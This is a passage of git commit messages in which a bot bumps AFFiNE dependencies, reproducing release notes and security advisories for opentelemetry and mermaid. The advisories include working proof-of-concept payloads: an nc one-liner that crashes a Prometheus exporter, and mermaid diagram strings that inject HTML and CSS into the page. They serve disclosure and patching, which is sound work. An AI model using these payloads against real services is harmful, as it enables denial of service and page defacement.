<summary>nestjs/swagger (@​nestjs/swagger)</summary> ### [`v11.4.2`](https://redirect.github.com/nestjs/swagger/compare/11.4.1...b0a35f3b20bedc6e6756f476cee182700a199b6e) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.1...11.4.2) ### [`v11.4.1`](https://redirect.github.com/nestjs/swagger/compare/11.4.0...14bd8f58d6011a1be03e266e39e472be0d4d3795) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.0...11.4.1) ### [`v11.4.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.0) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.3.2...11.4.0) #### 11.4.0 (2026-04-22) ##### Features - [#​3868](https://redirect.github.com/nestjs/swagger/pull/3868) feat(plugin): auto-mark optional [@​Query](https://redirect.github.com/Query) parameters as required: false ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3725](https://redirect.github.com/nestjs/swagger/pull/3725) feat(swagger): add OpenAPI 3.2 hierarchical tags support ([@​apt-bh](https://redirect.github.com/apt-bh)) ##### Bug fixes - [#​3874](https://redirect.github.com/nestjs/swagger/pull/3874) fix(document-builder): accept multi-digit OpenAPI version segments ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3873](https://redirect.github.com/nestjs/swagger/pull/3873) fix(plugin): strip regex delimiters and flags from [@​Matches](https://redirect.github.com/Matches) patterns ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3870](https://redirect.github.com/nestjs/swagger/pull/3870) fix(decorators): forward all OpenAPI parameter fields in [@​ApiHeader](https://redirect.github.com/ApiHeader) ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3872](https://redirect.github.com/nestjs/swagger/pull/3872) fix(plugin): emit [@​throws](https://redirect.github.com/throws) descriptions as proper string literals ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3782](https://redirect.github.com/nestjs/swagger/pull/3782) fix(schema): preserve example metadata for non-body params with named types ([@​maruthang](https://redirect.github.com/maruthang)) - [#​3761](https://redirect.github.com/nestjs/swagger/pull/3761) fix(plugin): support boolean literal types and boolean enum values ([@​lucreiss](https://redirect.github.com/lucreiss)) ##### Enhancements - [#​3865](https://redirect.github.com/nestjs/swagger/pull/3865) feat(schema-object-factory): include class name chain in circular dependency errors ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ##### Committers: 4 - Lu R A ([@​lucreiss](https://redirect.github.com/lucreiss)) - Maruthan G ([@​maruthang](https://redirect.github.com/maruthang)) - Yogeshwaran C ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [@​apt-bh](https://redirect.github.com/apt-bh) ### [`v11.3.2`](https://redirect.github.com/nestjs/swagger/compare/11.3.1...b16a1e19a8b7161e13c01c636acf3a187eabbd06) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.3.1...11.3.2) ### [`v11.3.1`](https://redirect.github.com/nestjs/swagger/compare/11.3.0...93744af0bb923daeebcc2b674bc7957d778d3953) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.3.0...11.3.1) ### [`v11.3.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.3.0) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.2.7...11.3.0) #### 11.3.0 (2026-04-15) ##### Bug fixes - [#​3826](https://redirect.github.com/nestjs/swagger/pull/3826) fix: support nullable field in [@​ApiResponse](https://redirect.github.com/ApiResponse) decorator ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) - [#​3784](https://redirect.github.com/nestjs/swagger/pull/3784) fix(schema): include type field when nullable is used with allOf ([@​maruthang](https://redirect.github.com/maruthang)) - [#​3774](https://redirect.github.com/nestjs/swagger/pull/3774) fix enum issue ([@​SupunGeethanjana](https://redirect.github.com/SupunGeethanjana)) - [#​3798](https://redirect.github.com/nestjs/swagger/pull/3798) fix(plugin): normalize workspace package import paths in metadata generator ([@​maruthang](https://redirect.github.com/maruthang)) - [#​3821](https://redirect.github.com/nestjs/swagger/pull/3821) fix(plugin): handle same-file type references in SWC readonly metadata generation ([@​maruthang](https://redirect.github.com/maruthang)) - [#​3822](https://redirect.github.com/nestjs/swagger/pull/3822) fix(type-helpers): eagerly apply plugin metadata properties in mapped type helpers ([@​maruthang](https://redirect.github.com/maruthang)) - [#​3840](https://redirect.github.com/nestjs/swagger/pull/3840) fix: use child class type when re-declaring an inherited [@​ApiProperty](https://redirect.github.com/ApiProperty) ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) ##### Enhancements - [#​3449](https://redirect.github.com/nestjs/swagger/pull/3449) feat(api-header): add example property to ApiHeader decorator ([@​leemhoon00](https://redirect.github.com/leemhoon00)) - [#​3787](https://redirect.github.com/nestjs/swagger/pull/3787) feat(decorators): support RegExp instances in [@​ApiProperty](https://redirect.github.com/ApiProperty)({ pattern }) ([@​temrjan](https://redirect.github.com/temrjan)) - [#​3699](https://redirect.github.com/nestjs/swagger/pull/3699) feat(api-body): add support for encoding in ApiBody decorator ([@​lamuertepeluda](https://redirect.github.com/lamuertepeluda)) - [#​3824](https://redirect.github.com/nestjs/swagger/pull/3824) feat: support async patchDocumentOnRequest hook ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) - [#​3834](https://redirect.github.com/nestjs/swagger/pull/3834) feat: expose generateSchema utility for programmatic schema access ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) - [#​3836](https://redirect.github.com/nestjs/swagger/pull/3836) feat(plugin): add autoFillEnumName option to suppress duplicate enum schemas ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) - [#​3837](https://redirect.github.com/nestjs/swagger/pull/3837) feat: merge descriptions when multiple decorators share the same HTTP status code ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) - [#​3839](https://redirect.github.com/nestjs/swagger/pull/3839) feat: add excludeDynamicDefaults option to strip runtime-evaluated schema defaults ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) - [#​3841](https://redirect.github.com/nestjs/swagger/pull/3841) feat: add DeepPartialType mapped-type helper for recursive optional properties ([@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)) ##### Dependencies - [#​3850](https://redirect.github.com/nestjs/swagger/pull/3850) fix(deps): update dependency swagger-ui-dist to v5.32.4 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) ##### Committers: 7 - JongHun Lim ([@​leemhoon00](https://redirect.github.com/leemhoon00)) - Maruthan G ([@​maruthang](https://redirect.github.com/maruthang)) - Rajasekar Janakiraman ([@​rajasekar33](https://redirect.github.com/rajasekar33)) - Supun Geethanjana Jayasinghe ([@​SupunGeethanjana](https://redirect.github.com/SupunGeethanjana)) - Temrjan ([@​temrjan](https://redirect.github.com/temrjan)) - Vito Macchia ([@​lamuertepeluda](https://redirect.github.com/lamuertepeluda)) - [@​Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNTYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f19a922793 |
chore: bump up @opentelemetry/sdk-node version to ^0.217.0 [SECURITY] (#14945)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.215.0` → `^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0) |  |  | --- ### Prometheus exporter process crash via malformed HTTP request [CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) / [GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) <details> <summary>More information</summary> #### Details ##### Summary A single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default `0.0.0.0:9464`) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught `TypeError` that terminates the process. **You are affected by this vulnerability if either of the following apply to your application:** * you directly use `@opentelemetry/exporter-prometheus` in your code through its built-in server. * your `OTEL_METRICS_EXPORTER` environment variable includes `prometheus` **AND** * you use `@opentelemetry/sdk-node` * you use `@opentelemetry/auto-instrumentations-node` via `--require @​opentelemetry/auto-instrumentations-node/register`/`--import @​opentelemetry/auto-instrumentations-node/register` ##### Impact **Denial of service.** Any application using the OpenTelemetry Prometheus exporter’s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required. ##### Remediation ##### Update to the fixed version Update `@opentelemetry/exporter-prometheus` and `@opentelemetry/sdk-node` to version **0.217.0** or later. Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0** or later. This release adds proper error handling around the URL constructor, returning an HTTP `400` response on parse failure rather than allowing the exception to propagate and crash the process. ``` npm install @​opentelemetry/exporter-prometheus@latest ``` ##### Do Not Expose the Endpoint to Untrusted Users > [!IMPORTANT] > The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that *can* reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to **0.217.0** is the recommended resolution. If updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example: * **Bind to localhost only** by setting the `host` option to `127.0.0.1` when configuring the `PrometheusExporter`, so the port is not exposed on public or shared network interfaces * **Use a firewall or network policy** to restrict access to port `9464` (or whichever port you have configured) to only trusted Prometheus scrape hosts * **Place the endpoint behind a reverse proxy** that filters or validates incoming requests before they reach the exporter ##### Details In `PrometheusExporter.ts`, the `_requestHandler` calls `new URL(request.url, this._baseUrl)` without any error handling. Node's HTTP parser accepts absolute-form URIs (e.g. `http://`) for proxy compatibility, including malformed ones. When `request.url` is `"http://"`, the `URL` constructor throws `TypeError: Invalid URL`. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process. The Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable by any network client that can connect to the metrics port. ##### Proof of Concept Start any Node.js application with the Prometheus exporter running on the default port `9464`, then send a single raw TCP packet: ``` echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464 ``` The process crashes immediately with: ``` TypeError: Invalid URL at new URL (...) at PrometheusExporter._requestHandler (...) ``` #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3) - [https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/sdk-node)</summary> ### [`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) ### [`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
ac6d0d35af |
chore: bump up @opentelemetry/exporter-prometheus version to ^0.217.0 [SECURITY] (#14944)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.215.0` → `^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0) |  |  | --- ### Prometheus exporter process crash via malformed HTTP request [CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) / [GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) <details> <summary>More information</summary> #### Details ##### Summary A single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default `0.0.0.0:9464`) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught `TypeError` that terminates the process. **You are affected by this vulnerability if either of the following apply to your application:** * you directly use `@opentelemetry/exporter-prometheus` in your code through its built-in server. * your `OTEL_METRICS_EXPORTER` environment variable includes `prometheus` **AND** * you use `@opentelemetry/sdk-node` * you use `@opentelemetry/auto-instrumentations-node` via `--require @​opentelemetry/auto-instrumentations-node/register`/`--import @​opentelemetry/auto-instrumentations-node/register` ##### Impact **Denial of service.** Any application using the OpenTelemetry Prometheus exporter’s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required. ##### Remediation ##### Update to the fixed version Update `@opentelemetry/exporter-prometheus` and `@opentelemetry/sdk-node` to version **0.217.0** or later. Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0** or later. This release adds proper error handling around the URL constructor, returning an HTTP `400` response on parse failure rather than allowing the exception to propagate and crash the process. ``` npm install @​opentelemetry/exporter-prometheus@latest ``` ##### Do Not Expose the Endpoint to Untrusted Users > [!IMPORTANT] > The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that *can* reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to **0.217.0** is the recommended resolution. If updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example: * **Bind to localhost only** by setting the `host` option to `127.0.0.1` when configuring the `PrometheusExporter`, so the port is not exposed on public or shared network interfaces * **Use a firewall or network policy** to restrict access to port `9464` (or whichever port you have configured) to only trusted Prometheus scrape hosts * **Place the endpoint behind a reverse proxy** that filters or validates incoming requests before they reach the exporter ##### Details In `PrometheusExporter.ts`, the `_requestHandler` calls `new URL(request.url, this._baseUrl)` without any error handling. Node's HTTP parser accepts absolute-form URIs (e.g. `http://`) for proxy compatibility, including malformed ones. When `request.url` is `"http://"`, the `URL` constructor throws `TypeError: Invalid URL`. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process. The Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable by any network client that can connect to the metrics port. ##### Proof of Concept Start any Node.js application with the Prometheus exporter running on the default port `9464`, then send a single raw TCP packet: ``` echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464 ``` The process crashes immediately with: ``` TypeError: Invalid URL at new URL (...) at PrometheusExporter._requestHandler (...) ``` #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3) - [https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) ### [`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
6b720206c6 |
chore: bump up mermaid version to v11.15.0 [SECURITY] (#14946)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`11.13.0` → `11.15.0`](https://renovatebot.com/diffs/npm/mermaid/11.13.0/11.15.0) |  |  | --- ### Mermaid: Improper sanitization of `classDef` in state diagrams leads to HTML injection [CVE-2026-41149](https://nvd.nist.gov/vuln/detail/CVE-2026-41149) / [GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr) <details> <summary>More information</summary> #### Details ##### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. ##### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ##### Patches - [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ##### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ##### Credits Thanks to @​zsxsoft from @​KeenSecurityLab for reporting this vulnerability. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr) - [https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056) - [https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) - [https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) - [https://github.com/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid: Improper sanitization of `classDefs` in diagrams leads to CSS injection [CVE-2026-41148](https://nvd.nist.gov/vuln/detail/CVE-2026-41148) / [GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r) <details> <summary>More information</summary> #### Details ##### Details The state diagram and any other diagram type that routes user-controlled style strings through createCssStyles parser for Mermaid v11.14.0 and earlier captures `classDef` values with an unrestricted regex: ```jison // packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83 <CLASSDEFID>[^\n]* { this.popState(); return 'CLASSDEF_STYLEOPTS' } ``` The value passes unsanitized through `addStyleClass()` -> `createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in the value closes the generated CSS selector, and everything after becomes a new CSS rule on the page. ##### PoC ``` stateDiagram-v2 classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")} ``` Live demo: <https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU> ##### Patches This has been patched in: - [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)) - [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)) ##### Workarounds Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ##### Impact Enables page defacement, user tracking via `url()` callbacks, and DOM attribute exfiltration via CSS `:has()` selectors. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r) - [https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102) - [https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) - [https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) - [https://github.com/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid: Improper sanitization of configuration leads to CSS injection [CVE-2026-41159](https://nvd.nist.gov/vuln/detail/CVE-2026-41159) / [GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p) <details> <summary>More information</summary> #### Details ##### Impact Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and `altFontFamily` configuration options. Live demo: [mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg) Example code: ``` %%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%% flowchart LR A --> B ``` The injected CSS exploits stylis's `&` (scope reference) handling. `:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles to all page elements. Global at-rules (`@font-face`, `@keyframes`, `@counter-style`) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS `:has()` selectors. ##### Patches - [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)) - [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)) ##### Workarounds If you can't upgrade mermaid, you can set the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. Setting [`"securityLevel": 